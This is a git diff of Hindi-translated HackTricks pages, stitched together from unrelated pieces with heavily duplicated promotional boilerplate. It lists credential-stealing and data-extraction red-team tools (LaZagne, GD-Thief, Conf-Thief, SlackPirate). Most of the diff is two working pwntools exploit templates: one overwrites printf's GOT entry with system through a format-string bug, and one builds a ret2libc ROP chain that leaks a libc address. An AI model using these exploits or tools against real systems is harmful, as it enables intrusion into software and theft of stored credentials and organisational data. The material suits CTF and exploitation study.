AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम एक्सपर्ट)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
**पोस्ट की जाँच करें [https://portswigger.net/research/browser-powered-desync-attacks](https://portswigger.net/research/browser-powered-desync-attacks)**
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS रेड टीम एक्सपर्ट)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
|
||||
* **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,41 +1,28 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## **Local l00t**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट्स, PE वेक्टर्स की खोज के अलावा, फाइलसिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगी।
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग एक स्थानीय कंप्यूटर पर संग्रहीत बहुत सारे पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अपने पासवर्ड्स को विभिन्न तकनीकों (plaintext, APIs, कस्टम एल्गोरिदम, डेटाबेस, आदि) का उपयोग करके संग्रहीत करता है। यह टूल सबसे अधिक प्रयुक्त सॉफ्टवेयर के लिए इन पासवर्ड्स को खोजने के उद्देश्य से विकसित किया गया है।
|
||||
|
||||
## **External Services**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence के API से एक्सेस टोकन का उपयोग करके कनेक्ट होगा, PDF में निर्यात करेगा, और उन Confluence दस्तावेजों को डाउनलोड करेगा जिन तक लक्ष्य की पहुँच है।
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): यह एक Red Team टूल है जो आपके (हमलावर) द्वारा पहुँच योग्य लक्ष्य के Google Drive से फाइलों को निकालने के लिए Google Drive API का उपयोग करता है। इसमें सभी साझा की गई फाइलें, साझा ड्राइव्स से सभी फाइलें, और डोमेन ड्राइव्स से सभी फाइलें शामिल हैं जिन तक लक्ष्य की पहुँच है।
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): यह एक Red Team टूल है जो लक्ष्य संगठन की Google People Directory को निकालने के लिए Google के People API का उपयोग करता है जिस तक आपकी पहुँच है।
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक Python में विकसित टूल है जो एक Slack workspace से 'रोचक' जानकारी निकालने के लिए मूल Slack APIs का उपयोग करता है, बशर्ते एक्सेस टोकन दिया गया हो।
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो लाल और नीली टीमों को एक Slack workspace/संगठन की त्वरित रेकी करने के लिए है। Slackhound एक संगठन के उपयोगकर्ताओं, फाइलों, संदेशों, आदि का संग्रह जल्दी से खोज योग्य बनाता है और बड़ी वस्तुओं को ऑफलाइन समीक्षा के लिए CSV में लिखा जाता है।
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram समूह**](https://t.me/peass) या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपोज़ में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें फॉलो करें**.
|
||||
* **हैकिंग ट्रिक्स साझा करें एक PR जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
## **स्थानीय लूट**
|
||||
|
||||
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): ये स्क्रिप्ट, PE वेक्टर्स की खोज के अलावा, फाइल सिस्टम के अंदर संवेदनशील जानकारी की खोज करेंगे।
|
||||
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne प्रोजेक्ट** एक ओपन सोर्स एप्लिकेशन है जिसका उपयोग स्थानीय कंप्यूटर पर स्टोर की गई कई पासवर्ड्स को पुनः प्राप्त करने के लिए किया जाता है। प्रत्येक सॉफ्टवेयर अलग-अलग तकनीकों (सादा पाठ, एपीआई, कस्टम एल्गोरिदम्स, डेटाबेस आदि) का उपयोग करके अपने पासवर्ड्स को स्टोर करता है। इस टूल का विकास इन पासवर्ड्स को खोजने के उद्देश्य से किया गया है जो सबसे अधिक प्रयोग किए जाने वाले सॉफ्टवेयर के लिए।
|
||||
|
||||
## **बाह्य सेवाएं**
|
||||
|
||||
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): यह मॉड्यूल Confluence की एपीआई से कनेक्ट होगा, पीडीएफ में निर्यात करेगा, और उन Confluence दस्तावेज़ों को डाउनलोड करेगा जिनका लक्ष्य है कि लक्ष्य का पहुंच है।
|
||||
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): रेड टीम टूल एक लक्ष्य के Google Drive से फ़ाइलों को बाहर निकालने के लिए जिसका आपका पहुंच है, Google Drive एपीआई के माध्यम से। इसमें सभी साझा फ़ाइलें, साझा ड्राइव से सभी फ़ाइलें, और डोमेन ड्राइव से सभी फ़ाइलें शामिल हैं जिनका लक्ष्य पहुंच है।
|
||||
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): रेड टीम टूल जिसका उपयोग Google के लोगों की डायरेक्टरी को बाहर निकालने के लिए किया जाता है, जिसका आपका पहुंच है, Google के लोगों की एपीआई के माध्यम से।
|
||||
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** यह एक टूल है जो पायथन में विकसित किया गया है जो एक एक्सेस टोकन देता है और एक स्लैक वर्कस्पेस से 'दिलचस्प' जानकारी निकालने के लिए नेटिव स्लैक एपीआई का उपयोग करता है।
|
||||
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound एक कमांड लाइन टूल है जो रेड और ब्लू टीमों को एक स्लैक वर्कस्पेस/संगठन की जांच तेजी से करने के लिए है। Slackhound संगठन के उपयोगकर्ताओं, फ़ाइलों, संदेशों आदि का संग्रहण तेजी से खोजने में मदद करता है और बड़े ऑब्जेक्ट्स को ऑफलाइन समीक्षा के लिए सीएसवी में लिखा जाता है।
|
||||
|
|
|
@ -1,2 +1,166 @@
|
|||
# Format Strings Template
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
```python
|
||||
from pwn import *
|
||||
from time import sleep
|
||||
|
||||
###################
|
||||
### CONNECTION ####
|
||||
###################
|
||||
|
||||
# Define how you want to exploit the binary
|
||||
LOCAL = True
|
||||
REMOTETTCP = False
|
||||
REMOTESSH = False
|
||||
GDB = False
|
||||
|
||||
# Configure vulnerable binary
|
||||
LOCAL_BIN = "./tyler"
|
||||
REMOTE_BIN = "./tyler" #For ssh
|
||||
|
||||
# In order to exploit the format string you may need to append/prepend some string to the payload
|
||||
# configure them here
|
||||
PREFIX_PAYLOAD = b""
|
||||
SUFFIX_PAYLOAD = b""
|
||||
NNUM_ALREADY_WRITTEN_BYTES = 0
|
||||
MAX_LENTGH = 999999 #Big num if not restricted
|
||||
|
||||
print(" ====================== ")
|
||||
print("Selected options:")
|
||||
print(f"PREFIX_PAYLOAD: {PREFIX_PAYLOAD}")
|
||||
print(f"SUFFIX_PAYLOAD: {SUFFIX_PAYLOAD}")
|
||||
print(f"NNUM_ALREADY_WRITTEN_BYTES: {NNUM_ALREADY_WRITTEN_BYTES}")
|
||||
print(" ====================== ")
|
||||
|
||||
|
||||
def connect_binary():
|
||||
global P, ELF_LOADED, ROP_LOADED
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1338) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
P = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(elf)# Find ROP gadgets
|
||||
|
||||
|
||||
#######################################
|
||||
### Get format string configuration ###
|
||||
#######################################
|
||||
|
||||
def send_payload(payload):
|
||||
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
|
||||
log.info("payload = %s" % repr(payload))
|
||||
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
|
||||
P.sendline(payload)
|
||||
sleep(0.5)
|
||||
return P.recv()
|
||||
|
||||
|
||||
def get_formatstring_config():
|
||||
global P
|
||||
|
||||
for offset in range(1,1000):
|
||||
connect_binary()
|
||||
P.clean()
|
||||
|
||||
payload = b"AAAA%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
|
||||
if b"41" in recieved:
|
||||
for padlen in range(0,4):
|
||||
if b"41414141" in recieved:
|
||||
connect_binary()
|
||||
payload = b" "*padlen + b"BBBB%" + bytes(str(offset), "utf-8") + b"$p"
|
||||
recieved = send_payload(payload).strip()
|
||||
print(recieved)
|
||||
if b"42424242" in recieved:
|
||||
log.info(f"Found offset ({offset}) and padlen ({padlen})")
|
||||
return offset, padlen
|
||||
|
||||
else:
|
||||
connect_binary()
|
||||
payload = b" " + payload
|
||||
recieved = send_payload(payload).strip()
|
||||
|
||||
|
||||
# In order to exploit a format string you need to find a position where part of your payload
|
||||
# is being reflected. Then, you will be able to put in the position arbitrary addresses
|
||||
# and write arbitrary content in those addresses
|
||||
# Therefore, the function get_formatstring_config will find the offset and padd needed to exploit the format string
|
||||
|
||||
offset, padlen = get_formatstring_config()
|
||||
|
||||
|
||||
# In this template, the GOT of printf (the part of the GOT table that points to where the printf
|
||||
# function resides) is going to be modified by the address of the system inside the PLT (the
|
||||
# part of the code that will jump to the system function).
|
||||
# Therefore, next time the printf function is executed, system will be executed instead with the same
|
||||
# parameters passed to printf
|
||||
|
||||
# In some scenarios you will need to loop1 more time to the vulnerability
|
||||
# In that cases you need to overwrite a pointer in the .fini_array for example
|
||||
# Uncomment the commented code below to gain 1 rexecution extra
|
||||
|
||||
#P_FINI_ARRAY = ELF_LOADED.symbols["__init_array_end"] # .fini_array address
|
||||
#INIT_LOOP_ADDR = 0x8048614 # Address to go back
|
||||
SYSTEM_PLT = ELF_LOADED.plt["system"]
|
||||
P_GOT = ELF_LOADED.got["printf"]
|
||||
|
||||
#log.info(f"Init loop address: {hex(INIT_LOOP_ADDR)}")
|
||||
#log.info(f"fini.array address: {hex(P_FINI_ARRAY)}")
|
||||
log.info(f"System PLT address: {hex(SYSTEM_PLT)}")
|
||||
log.info(f"Printf GOT address: {hex(P_GOT)}")
|
||||
|
||||
connect_binary()
|
||||
if GDB and not REMOTETTCP and not REMOTESSH:
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main") #Add more breaks separeted by "\n"
|
||||
sleep(5)
|
||||
|
||||
format_string = FmtStr(execute_fmt=send_payload, offset=offset, padlen=padlen, numbwritten=NNUM_ALREADY_WRITTEN_BYTES)
|
||||
#format_string.write(P_FINI_ARRAY, INIT_LOOP_ADDR)
|
||||
format_string.write(P_GOT, SYSTEM_PLT)
|
||||
format_string.execute_writes()
|
||||
|
||||
# Now that printf function is executing system you just need to find a place where you can
|
||||
# control the parameters passed to printf to execute arbitrary code.
|
||||
|
||||
P.interactive()
|
||||
```
|
||||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -0,0 +1,242 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें ट्विटर पर फॉलो करें 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
|
||||
{% code title="template.py" %}
|
||||
```python
|
||||
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
|
||||
|
||||
|
||||
###################
|
||||
### CONNECTION ####
|
||||
###################
|
||||
LOCAL = False
|
||||
REMOTETTCP = True
|
||||
REMOTESSH = False
|
||||
GDB = False
|
||||
USE_ONE_GADGET = False
|
||||
|
||||
LOCAL_BIN = "./vuln"
|
||||
REMOTE_BIN = "~/vuln" #For ssh
|
||||
LIBC = "" #ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it
|
||||
ENV = {"LD_PRELOAD": LIBC} if LIBC else {}
|
||||
|
||||
if LOCAL:
|
||||
P = process(LOCAL_BIN, env=ENV) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTETTCP:
|
||||
P = remote('10.10.10.10',1339) # start the vuln binary
|
||||
ELF_LOADED = ELF(LOCAL_BIN)# Extract data from binary
|
||||
ROP_LOADED = ROP(ELF_LOADED)# Find ROP gadgets
|
||||
|
||||
elif REMOTESSH:
|
||||
ssh_shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
|
||||
p = ssh_shell.process(REMOTE_BIN) # start the vuln binary
|
||||
elf = ELF(LOCAL_BIN)# Extract data from binary
|
||||
rop = ROP(elf)# Find ROP gadgets
|
||||
|
||||
if GDB and not REMOTETTCP and not REMOTESSH:
|
||||
# attach gdb and continue
|
||||
# You can set breakpoints, for example "break *main"
|
||||
gdb.attach(P.pid, "b *main")
|
||||
|
||||
|
||||
|
||||
#########################
|
||||
#### OFFSET FINDER ######
|
||||
#########################
|
||||
|
||||
OFFSET = b"" #b"A"*264
|
||||
if OFFSET == b"":
|
||||
gdb.attach(P.pid, "c") #Attach and continue
|
||||
payload = cyclic(264)
|
||||
payload += b"AAAAAAAA"
|
||||
print(P.clean())
|
||||
P.sendline(payload)
|
||||
#x/wx $rsp -- Search for bytes that crashed the application
|
||||
#print(cyclic_find(0x63616171)) # Find the offset of those bytes
|
||||
P.interactive()
|
||||
exit()
|
||||
|
||||
|
||||
|
||||
####################
|
||||
### Find Gadgets ###
|
||||
####################
|
||||
try:
|
||||
libc_func = "puts"
|
||||
PUTS_PLT = ELF_LOADED.plt['puts'] #PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call puts
|
||||
except:
|
||||
libc_func = "printf"
|
||||
PUTS_PLT = ELF_LOADED.plt['printf']
|
||||
|
||||
MAIN_PLT = ELF_LOADED.symbols['main']
|
||||
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"
|
||||
RET = (ROP_LOADED.find_gadget(['ret']))[0]
|
||||
|
||||
log.info("Main start: " + hex(MAIN_PLT))
|
||||
log.info("Puts plt: " + hex(PUTS_PLT))
|
||||
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
|
||||
log.info("ret gadget: " + hex(RET))
|
||||
|
||||
|
||||
########################
|
||||
### Find LIBC offset ###
|
||||
########################
|
||||
|
||||
def generate_payload_aligned(rop):
|
||||
payload1 = OFFSET + rop
|
||||
if (len(payload1) % 16) == 0:
|
||||
return payload1
|
||||
|
||||
else:
|
||||
payload2 = OFFSET + p64(RET) + rop
|
||||
if (len(payload2) % 16) == 0:
|
||||
log.info("Payload aligned successfully")
|
||||
return payload2
|
||||
else:
|
||||
log.warning(f"I couldn't align the payload! Len: {len(payload1)}")
|
||||
return payload1
|
||||
|
||||
|
||||
def get_addr(libc_func):
|
||||
FUNC_GOT = ELF_LOADED.got[libc_func]
|
||||
log.info(libc_func + " GOT @ " + hex(FUNC_GOT))
|
||||
# Create rop chain
|
||||
rop1 = p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
|
||||
rop1 = generate_payload_aligned(rop1)
|
||||
|
||||
# Send our rop-chain payload
|
||||
#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is received
|
||||
print(P.clean()) # clean socket buffer (read all and print)
|
||||
P.sendline(rop1)
|
||||
|
||||
# If binary is echoing back the payload, remove that message
|
||||
recieved = P.recvline().strip()
|
||||
if OFFSET[:30] in recieved:
|
||||
recieved = P.recvline().strip()
|
||||
|
||||
# Parse leaked address
|
||||
log.info(f"Len rop1: {len(rop1)}")
|
||||
leak = u64(recieved.ljust(8, b"\x00"))
|
||||
log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")
|
||||
|
||||
# Set lib base address
|
||||
if LIBC:
|
||||
LIBC.address = leak - LIBC.symbols[libc_func] #Save LIBC base
|
||||
print("If LIBC base doesn't end end 00, you might be using an icorrect libc library")
|
||||
log.info("LIBC base @ %s" % hex(LIBC.address))
|
||||
|
||||
# If not LIBC yet, stop here
|
||||
else:
|
||||
print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")
|
||||
P.interactive()
|
||||
|
||||
return hex(leak)
|
||||
|
||||
